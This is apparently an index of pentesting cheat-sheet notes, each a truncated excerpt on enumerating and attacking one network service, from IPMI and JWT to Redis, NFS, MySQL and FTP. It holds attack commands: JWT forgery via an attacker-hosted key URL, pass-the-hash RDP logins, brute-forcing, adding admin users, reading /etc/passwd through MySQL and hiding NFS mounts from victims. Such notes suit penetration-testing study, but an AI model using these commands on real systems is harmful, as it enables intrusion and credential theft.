-
UDP 623 https://book.hacktricks.xyz/pentesting/623-udp-ipmi Metasplot: scanner/ipmi/ipmi_version scanner/ipmi/ipmi_dumphashes ipmitool Tool for managing IPMI See hacktricks article
-
Use https://jwt.io/ to decode JWT It also shows the various parts. A JWT token has multiple parts in base64, separated by a point character. Create JWT token Create PEM SSH key: openssl genrsa -out private.pem 2048 Create base64 from header and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$// =>…
-
IKE is used on VPN servers on UDP 500. Test a server with ike-scan -M $target Example output: SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify PSK means that a preshared key is used. 1 returned handshake, 0, returned notify means that…
-
Example: # telnet $target 110 Trying 10.10.10.51… Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS root +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows ...
-
See POP3.
-
Login Bevor login, convert username and password into base64. (!) Use telnet — nc sometimes does not work and does not return the server’s response! HELO mynameAUTH LOGINcm9vdAo= // username in base64334 Server reponds with base64 stringcm9vdAo= // password in base64235 ok // success
-
Detect SNMP-devices: nmap -sU --open -p 161 10.11.1.1-254 -oG mega-snmp.txt onesixtyone Brute force of community strings against IPs. The following example tries to log in into SMTP devises via a given IP and given community names. echo public > community echo private >> community echo manager >> community for ip in $(seq 1 254);do echo 10.11.1.$ip;done…
-
Manual enumeration Subdomain enumeration Put usual domain names (Seclists!) and iterate them with the bash $ for ip in $(cat list.txt); do host $ip.domain.com; done IP enumeration Enumerate an IP range to find domains $ for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found" Zone transfer Perform a DNS zone…
-
Notes If the server needs old crypto, use -oKexAlgorithms=+diffie-hellman-group1-sha1 OpenSSH 7.7. allows to enumerate existing users. It could be possible on Windows 10 ssh-agent to extract the keys. Keys Get fingerprints nmap -p22 --script ssh-hostkey $target Get hostkeys nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full $target Extract fingerprints from existing key file: ssh-keygen -E md5 -lf /tmp/found_keyssh-keygen -E sha1…
-
Checkout a repo: svn checkout svn://... Show log svn log Show infos svn info Show all branches svn ls svn://$victim --verbose The first number from the previous command shows the revision. To see the content of a repo for another revision, add the r flag: svn ls svn://$victim --verbose -r 1 svn ls svn://$victim --verbose -r 2…
-
Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target To log in with a NTML hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…
-
Show shares with smbclient: smbclient --no-pass -L //$targetsmbclient -U guest //$target/smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory Show shares with other clients: smbmap -R -H $target // No usersmbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // Usernmap -sV --script=smb-enum-shares -p445 $targetcrackmapexec smb $target -u '' -p '' --shares Vulnerability scan nmap --script=smb-vul* -p445 $target…
-
Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to been uploaded first or it has to be known how to communicate with it. General A Java registry daemon has to be running. Run rmiregistry (bundled with Java) from…
-
NTML infos nmap -p 23 --script telnet-ntlm-info $target Brute-force nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=5s $target hydra -P passwords.txt -L users.txt $target telnet -V hydra -C users_and_passwords.txt $target telnet -V
-
Overview Tomcat usually listens on the following ports: 8080 — HTTP 8005 — Port for shutting down the Tomcat server; not interesting here 8009 — Same functions as the HTTP port, but via the Apache JServ protocol AJP. AJP is basically HTTP in a compressed/binary form. Checklist Check if /manager is accessible. Default credentials are tomcat / s3cret or…
-
Accessing in Linux: impacket-mssqlclient Administrator:password@$target -windows-auth Default databases are: Enumeration Determine version nmap -p 445 --script ms-sql-info $target Via metasploit auxiliary/scanner/mssql/mssql_ping Via Impacket mssqlinstance.py $target Login brute force scanner/mssql/mssql_login When an account is known, enumerate for vulnerabilities auxiliary/admin/mssql/mssql_enum Exploitation Execute commands auxiliary/admin/mssql/mssql_exec Get shell windows/mssql/mssql_payload Tools Command line sqsh -U sa -P $password -S $target:1433 From PowerShell sqlcmd -S…
-
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
-
Windows Remote Management (WinRM / wsman) is a service which runs on port 5985 and 5986. Evil Winrm Github | Opens a shell for a user root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!' For many users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f…
-
Basics Authentication sequence for an user to log in on a domain (controller): Authentication sequence for an authenticated user on a local system: Terminology Kerberoasting means an offline cracking of the password in the NTLM hash. Useless if the service runs as service user. Then, the password will be replaced by a 128 character long…
-
Runs on port 6379 — needs a full nmap scan! If conection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…
-
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
-
Brute force is possible with nmap: # nmap --script vnc-brute -p 5900 localhost For TightVNC, use vncpwd to break passwords. A password can be obtained via reg query HKLM\Software\TightVNC\Server\ /v Password
-
Displays all available network shares: showmount -e $target Normal mount mount -t nfs $target:/home /mnt Mounting with nfspy — with the hide option, it mounts and unmounts for the server so the victim cannot see the new connection via showmount. nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via SSH ssh -N -L 3049:localhost:2049 user@hostname mount -t nfs -o port=3049…
-
tcp/135 udp/135 — and as (Microsoft) Remote Procedure Call on tcp/593 as web service. Enumeration Obtain general information # rpcinfo -p $target # rpcinfo -s $target Connect. Hint: auto completion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enumerate through all API endpoints with one of the following options. python /usr/local/bin/rpcdump.py $target |…
-
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…
-
Note that FTP doesn’t show hidden files! Try in Windows e.g “cd ProgramData”. Enumeration With nmap. Scans a network for ftp servers which allow anonymous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP specification defines FTP relays. One FTP server can say to another FTP server to send files to another third-party server.…